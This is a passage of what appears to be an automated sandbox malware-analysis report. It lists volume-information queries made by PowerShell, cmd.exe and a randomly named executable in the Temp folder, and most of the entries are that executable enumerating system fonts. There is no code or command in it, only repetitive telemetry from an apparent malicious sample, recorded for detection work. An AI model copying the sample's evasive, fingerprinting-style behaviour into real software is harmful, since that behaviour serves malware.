Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
